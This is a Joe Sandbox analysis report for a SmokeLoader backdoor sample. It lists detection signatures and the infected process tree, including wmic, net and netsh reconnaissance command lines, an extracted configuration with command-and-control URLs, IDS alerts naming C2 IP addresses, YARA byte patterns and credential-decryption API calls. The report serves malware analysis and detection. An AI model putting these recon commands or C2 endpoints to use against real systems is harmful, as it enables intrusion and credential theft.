Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
v173TV3V11.exe

Overview

General Information

Sample name:v173TV3V11.exe
renamed because original name is a hash value
Original sample name:c108169f00ff9c5ad6fa70df9137e44a.exe
Analysis ID:1524644
MD5:c108169f00ff9c5ad6fa70df9137e44a
SHA1:1acfe826a57cdd04016324bcadaa6c7cd273b1f7
SHA256:5c86632a8ef4e46497b06979b965000700a51a2e1fdcf2bed91ff9c5b963a179
Tags:exeStealcuser-abuse_ch
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the windows firewall
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ipconfig to lookup or modify the Windows network settings
Uses netsh to modify the Windows network and firewall settings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the current domain controller via net
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • v173TV3V11.exe (PID: 2196 cmdline: "C:\Users\user\Desktop\v173TV3V11.exe" MD5: C108169F00FF9C5AD6FA70DF9137E44A)
    • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • C35.exe (PID: 1856 cmdline: C:\Users\user\AppData\Local\Temp\C35.exe MD5: 31B228301D6FB368186C2D025311D1AF)
      • 451E.exe (PID: 6696 cmdline: C:\Users\user\AppData\Local\Temp\451E.exe MD5: 69C7186C5393D5E94294E39DA1D4D830)
        • cmd.exe (PID: 2692 cmdline: cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 5868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WMIC.exe (PID: 3352 cmdline: wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 888 cmdline: wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 5812 cmdline: wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 2164 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 5448 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 4092 cmdline: wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 5408 cmdline: wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 1420 cmdline: wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 1860 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 2708 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 2908 cmdline: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 3328 cmdline: wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 5480 cmdline: wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 3616 cmdline: wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • ipconfig.exe (PID: 6240 cmdline: ipconfig /displaydns MD5: 62F170FB07FDBB79CEB7147101406EB8)
          • ROUTE.EXE (PID: 6264 cmdline: route print MD5: 3C97E63423E527BA8381E81CBA00B8CD)
          • netsh.exe (PID: 6304 cmdline: netsh firewall show state MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
          • systeminfo.exe (PID: 6344 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
          • tasklist.exe (PID: 6020 cmdline: tasklist /v /fo csv MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
          • net.exe (PID: 7120 cmdline: net accounts /domain MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
            • net1.exe (PID: 3552 cmdline: C:\Windows\system32\net1 accounts /domain MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
          • net.exe (PID: 2740 cmdline: net share MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
            • net1.exe (PID: 7148 cmdline: C:\Windows\system32\net1 share MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
          • net.exe (PID: 6504 cmdline: net user MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
      • explorer.exe (PID: 6916 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 4900 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
      • explorer.exe (PID: 2176 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 5368 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
      • explorer.exe (PID: 3588 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 5268 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • bsjhhuh (PID: 5868 cmdline: C:\Users\user\AppData\Roaming\bsjhhuh MD5: C108169F00FF9C5AD6FA70DF9137E44A)
  • vejhhuh (PID: 4500 cmdline: C:\Users\user\AppData\Roaming\vejhhuh MD5: 31B228301D6FB368186C2D025311D1AF)
  • msiexec.exe (PID: 6940 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}
SourceRuleDescriptionAuthorStrings
00000011.00000002.4175265628.0000000000F61000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_SmokeLoaderYara detected SmokeLoaderJoe Security
    00000005.00000002.2024427682.0000000002091000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000005.00000002.2024427682.0000000002091000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
      • 0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
      00000005.00000002.2024380318.0000000002070000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        00000005.00000002.2024380318.0000000002070000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
        • 0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
        Click to see the 25 entries
        SourceRuleDescriptionAuthorStrings
        6.2.C35.exe.6b0e67.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          6.3.C35.exe.6c0000.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            6.2.C35.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              8.2.vejhhuh.670e67.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                8.2.vejhhuh.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                  Click to see the 1 entries

                  System Summary

                  barindex
                  Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\bsjhhuh, CommandLine: C:\Users\user\AppData\Roaming\bsjhhuh, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\bsjhhuh, NewProcessName: C:\Users\user\AppData\Roaming\bsjhhuh, OriginalFileName: C:\Users\user\AppData\Roaming\bsjhhuh, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\bsjhhuh, ProcessId: 5868, ProcessName: bsjhhuh
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems): Data: Command: net accounts /domain, CommandLine: net accounts /domain, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2692, ParentProcessName: cmd.exe, ProcessCommandLine: net accounts /domain, ProcessId: 7120, ProcessName: net.exe
                  Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , CommandLine: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2692, ParentProcessName: cmd.exe, ProcessCommandLine: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , ProcessId: 2908, ProcessName: WMIC.exe
                  Source: Process startedAuthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net accounts /domain, CommandLine: net accounts /domain, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2692, ParentProcessName: cmd.exe, ProcessCommandLine: net accounts /domain, ProcessId: 7120, ProcessName: net.exe
                  Source: Process startedAuthor: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io': Data: Command: route print, CommandLine: route print, CommandLine|base64offset|contains: , Image: C:\Windows\System32\ROUTE.EXE, NewProcessName: C:\Windows\System32\ROUTE.EXE, OriginalFileName: C:\Windows\System32\ROUTE.EXE, ParentCommandLine: cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2692, ParentProcessName: cmd.exe, ProcessCommandLine: route print, ProcessId: 6264, ProcessName: ROUTE.EXE
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-03T02:52:23.786088+020020391031A Network Trojan was detected192.168.2.449736190.219.117.24080TCP
                  2024-10-03T02:52:24.904716+020020391031A Network Trojan was detected192.168.2.449737190.219.117.24080TCP
                  2024-10-03T02:52:26.182658+020020391031A Network Trojan was detected192.168.2.449738190.219.117.24080TCP
                  2024-10-03T02:52:27.283559+020020391031A Network Trojan was detected192.168.2.449739190.219.117.24080TCP
                  2024-10-03T02:52:28.391966+020020391031A Network Trojan was detected192.168.2.449740190.219.117.24080TCP
                  2024-10-03T02:52:30.168698+020020391031A Network Trojan was detected192.168.2.449741190.219.117.24080TCP
                  2024-10-03T02:52:31.286466+020020391031A Network Trojan was detected192.168.2.449742190.219.117.24080TCP
                  2024-10-03T02:52:32.378001+020020391031A Network Trojan was detected192.168.2.449743190.219.117.24080TCP
                  2024-10-03T02:52:33.467881+020020391031A Network Trojan was detected192.168.2.449744190.219.117.24080TCP
                  2024-10-03T02:52:34.595323+020020391031A Network Trojan was detected192.168.2.449745190.219.117.24080TCP
                  2024-10-03T02:52:35.763792+020020391031A Network Trojan was detected192.168.2.449746190.219.117.24080TCP
                  2024-10-03T02:52:36.903395+020020391031A Network Trojan was detected192.168.2.449747190.219.117.24080TCP
                  2024-10-03T02:52:38.030099+020020391031A Network Trojan was detected192.168.2.449748190.219.117.24080TCP
                  2024-10-03T02:52:39.129458+020020391031A Network Trojan was detected192.168.2.449749190.219.117.24080TCP
                  2024-10-03T02:52:41.272613+020020391031A Network Trojan was detected192.168.2.449750190.219.117.24080TCP
                  2024-10-03T02:52:42.384476+020020391031A Network Trojan was detected192.168.2.449751190.219.117.24080TCP
                  2024-10-03T02:52:43.560652+020020391031A Network Trojan was detected192.168.2.449752190.219.117.24080TCP
                  2024-10-03T02:52:44.667910+020020391031A Network Trojan was detected192.168.2.449753190.219.117.24080TCP
                  2024-10-03T02:52:45.777403+020020391031A Network Trojan was detected192.168.2.449754190.219.117.24080TCP
                  2024-10-03T02:52:46.914017+020020391031A Network Trojan was detected192.168.2.449755190.219.117.24080TCP
                  2024-10-03T02:52:48.014248+020020391031A Network Trojan was detected192.168.2.449756190.219.117.24080TCP
                  2024-10-03T02:52:49.132178+020020391031A Network Trojan was detected192.168.2.449757190.219.117.24080TCP
                  2024-10-03T02:52:50.225515+020020391031A Network Trojan was detected192.168.2.449758190.219.117.24080TCP
                  2024-10-03T02:52:51.419382+020020391031A Network Trojan was detected192.168.2.449759190.219.117.24080TCP
                  2024-10-03T02:52:52.746812+020020391031A Network Trojan was detected192.168.2.449760190.219.117.24080TCP
                  2024-10-03T02:52:55.089069+020020391031A Network Trojan was detected192.168.2.449763190.219.117.24080TCP
                  2024-10-03T02:52:56.197435+020020391031A Network Trojan was detected192.168.2.449764190.219.117.24080TCP
                  2024-10-03T02:52:57.297018+020020391031A Network Trojan was detected192.168.2.449765190.219.117.24080TCP
                  2024-10-03T02:52:58.428777+020020391031A Network Trojan was detected192.168.2.449766190.219.117.24080TCP
                  2024-10-03T02:52:59.545775+020020391031A Network Trojan was detected192.168.2.449767190.219.117.24080TCP
                  2024-10-03T02:53:17.311199+020020391031A Network Trojan was detected192.168.2.44976823.145.40.162443TCP
                  2024-10-03T02:53:18.822466+020020391031A Network Trojan was detected192.168.2.44976923.145.40.162443TCP
                  2024-10-03T02:53:19.796874+020020391031A Network Trojan was detected192.168.2.44977023.145.40.162443TCP
                  2024-10-03T02:53:20.702172+020020391031A Network Trojan was detected192.168.2.44977123.145.40.162443TCP
                  2024-10-03T02:53:21.627296+020020391031A Network Trojan was detected192.168.2.44977223.145.40.162443TCP
                  2024-10-03T02:53:22.504515+020020391031A Network Trojan was detected192.168.2.44977323.145.40.162443TCP
                  2024-10-03T02:53:23.621205+020020391031A Network Trojan was detected192.168.2.44977423.145.40.162443TCP
                  2024-10-03T02:53:24.505897+020020391031A Network Trojan was detected192.168.2.44977523.145.40.162443TCP
                  2024-10-03T02:53:25.432551+020020391031A Network Trojan was detected192.168.2.44977623.145.40.162443TCP
                  2024-10-03T02:53:26.279216+020020391031A Network Trojan was detected192.168.2.44977723.145.40.162443TCP
                  2024-10-03T02:53:27.149314+020020391031A Network Trojan was detected192.168.2.44977823.145.40.162443TCP
                  2024-10-03T02:53:28.117408+020020391031A Network Trojan was detected192.168.2.44977923.145.40.162443TCP
                  2024-10-03T02:53:29.105071+020020391031A Network Trojan was detected192.168.2.44978023.145.40.162443TCP
                  2024-10-03T02:53:29.986819+020020391031A Network Trojan was detected192.168.2.44978123.145.40.162443TCP
                  2024-10-03T02:53:31.633961+020020391031A Network Trojan was detected192.168.2.44978223.145.40.162443TCP
                  2024-10-03T02:53:32.525840+020020391031A Network Trojan was detected192.168.2.44978323.145.40.162443TCP
                  2024-10-03T02:53:33.464530+020020391031A Network Trojan was detected192.168.2.44978423.145.40.162443TCP
                  2024-10-03T02:53:37.932180+020020391031A Network Trojan was detected192.168.2.44978523.145.40.162443TCP
                  2024-10-03T02:54:09.019446+020020391031A Network Trojan was detected192.168.2.449786190.219.117.24080TCP
                  2024-10-03T02:54:15.778409+020020391031A Network Trojan was detected192.168.2.449787190.219.117.24080TCP
                  2024-10-03T02:54:24.178713+020020391031A Network Trojan was detected192.168.2.449788190.219.117.24080TCP
                  2024-10-03T02:54:31.831285+020020391031A Network Trojan was detected192.168.2.449789190.219.117.24080TCP
                  2024-10-03T02:54:41.494607+020020391031A Network Trojan was detected192.168.2.449790190.219.117.24080TCP
                  2024-10-03T02:54:53.531734+020020391031A Network Trojan was detected192.168.2.44979123.145.40.162443TCP
                  2024-10-03T02:54:56.654275+020020391031A Network Trojan was detected192.168.2.449792201.212.52.19780TCP
                  2024-10-03T02:55:09.647073+020020391031A Network Trojan was detected192.168.2.44979323.145.40.162443TCP
                  2024-10-03T02:55:14.179610+020020391031A Network Trojan was detected192.168.2.449794201.212.52.19780TCP
                  2024-10-03T02:55:27.283552+020020391031A Network Trojan was detected192.168.2.44979523.145.40.162443TCP
                  2024-10-03T02:55:31.392173+020020391031A Network Trojan was detected192.168.2.449796201.212.52.19780TCP
                  2024-10-03T02:55:44.012872+020020391031A Network Trojan was detected192.168.2.44979723.145.40.162443TCP
                  2024-10-03T02:55:49.226473+020020391031A Network Trojan was detected192.168.2.449798201.212.52.19780TCP
                  2024-10-03T02:56:00.601332+020020391031A Network Trojan was detected192.168.2.44979923.145.40.162443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-03T02:56:07.147321+020020190821A Network Trojan was detected192.168.2.44980023.145.40.113443TCP
                  2024-10-03T02:56:07.152005+020020190821A Network Trojan was detected192.168.2.44980023.145.40.113443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-03T02:53:17.662722+020028098821Malware Command and Control Activity Detected192.168.2.44976823.145.40.162443TCP
                  2024-10-03T02:53:19.181475+020028098821Malware Command and Control Activity Detected192.168.2.44976923.145.40.162443TCP
                  2024-10-03T02:53:20.075572+020028098821Malware Command and Control Activity Detected192.168.2.44977023.145.40.162443TCP
                  2024-10-03T02:53:20.989913+020028098821Malware Command and Control Activity Detected192.168.2.44977123.145.40.162443TCP
                  2024-10-03T02:53:21.908752+020028098821Malware Command and Control Activity Detected192.168.2.44977223.145.40.162443TCP
                  2024-10-03T02:53:22.783712+020028098821Malware Command and Control Activity Detected192.168.2.44977323.145.40.162443TCP
                  2024-10-03T02:53:23.899735+020028098821Malware Command and Control Activity Detected192.168.2.44977423.145.40.162443TCP
                  2024-10-03T02:53:24.778948+020028098821Malware Command and Control Activity Detected192.168.2.44977523.145.40.162443TCP
                  2024-10-03T02:53:25.666516+020028098821Malware Command and Control Activity Detected192.168.2.44977623.145.40.162443TCP
                  2024-10-03T02:53:26.548436+020028098821Malware Command and Control Activity Detected192.168.2.44977723.145.40.162443TCP
                  2024-10-03T02:53:27.429508+020028098821Malware Command and Control Activity Detected192.168.2.44977823.145.40.162443TCP
                  2024-10-03T02:53:28.411820+020028098821Malware Command and Control Activity Detected192.168.2.44977923.145.40.162443TCP
                  2024-10-03T02:53:29.382194+020028098821Malware Command and Control Activity Detected192.168.2.44978023.145.40.162443TCP
                  2024-10-03T02:53:30.255048+020028098821Malware Command and Control Activity Detected192.168.2.44978123.145.40.162443TCP
                  2024-10-03T02:53:31.913190+020028098821Malware Command and Control Activity Detected192.168.2.44978223.145.40.162443TCP
                  2024-10-03T02:53:32.807619+020028098821Malware Command and Control Activity Detected192.168.2.44978323.145.40.162443TCP
                  2024-10-03T02:53:33.727819+020028098821Malware Command and Control Activity Detected192.168.2.44978423.145.40.162443TCP
                  2024-10-03T02:54:53.771450+020028098821Malware Command and Control Activity Detected192.168.2.44979123.145.40.162443TCP
                  2024-10-03T02:55:09.932594+020028098821Malware Command and Control Activity Detected192.168.2.44979323.145.40.162443TCP
                  2024-10-03T02:55:27.953196+020028098821Malware Command and Control Activity Detected192.168.2.44979523.145.40.162443TCP
                  2024-10-03T02:55:44.353405+020028098821Malware Command and Control Activity Detected192.168.2.44979723.145.40.162443TCP
                  2024-10-03T02:56:00.871816+020028098821Malware Command and Control Activity Detected192.168.2.44979923.145.40.162443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-03T02:53:17.816351+020028298482Potentially Bad Traffic23.145.40.162443192.168.2.449768TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: v173TV3V11.exeAvira: detected
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeAvira: detection malicious, Label: HEUR/AGEN.1312571
                  Source: C:\Users\user\AppData\Roaming\bsjhhuhAvira: detection malicious, Label: HEUR/AGEN.1312571
                  Source: C:\Users\user\AppData\Roaming\vejhhuhAvira: detection malicious, Label: HEUR/AGEN.1312571
                  Source: 00000005.00000002.2024380318.0000000002070000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}
                  Source: calvinandhalls.comVirustotal: Detection: 5%Perma Link
                  Source: nwgrus.ruVirustotal: Detection: 12%Perma Link
                  Source: http://nwgrus.ru/tmp/index.phpVirustotal: Detection: 15%Perma Link
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeReversingLabs: Detection: 36%
                  Source: C:\Users\user\AppData\Roaming\bsjhhuhReversingLabs: Detection: 28%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Roaming\bsjhhuhJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Roaming\vejhhuhJoe Sandbox ML: detected
                  Source: v173TV3V11.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeCode function: 9_2_00007FF763AF36F0 CryptExportKey,CryptExportKey,9_2_00007FF763AF36F0
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeCode function: 9_2_00007FF763AF3220 CertGetCertificateContextProperty,CryptAcquireCertificatePrivateKey,CryptGetUserKey,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,CryptExportKey,VirtualProtect,VirtualProtect,CryptAcquireContextA,CryptImportKey,OpenSCManagerA,OpenServiceA,QueryServiceStatusEx,OpenProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,NCryptExportKey,CertOpenStore,CertAddCertificateLinkToStore,CertSetCertificateContextProperty,PFXExportCertStoreEx,PFXExportCertStoreEx,9_2_00007FF763AF3220
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00803098 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,CryptUnprotectData,DeleteFileW,11_2_00803098
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00803717 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,CryptUnprotectData,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,lstrlen,DeleteFileW,11_2_00803717
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00803E04 RtlCompareMemory,CryptUnprotectData,11_2_00803E04
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00801198 CryptBinaryToStringA,CryptBinaryToStringA,11_2_00801198
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_008011E1 lstrcmpiW,lstrlenW,CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW,11_2_008011E1
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0080123B lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,11_2_0080123B
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00801FCE CryptUnprotectData,RtlMoveMemory,11_2_00801FCE
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_034A2404 lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,16_2_034A2404
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_034A245E lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,16_2_034A245E
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_034A263E CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,16_2_034A263E
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_00552799 CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,19_2_00552799
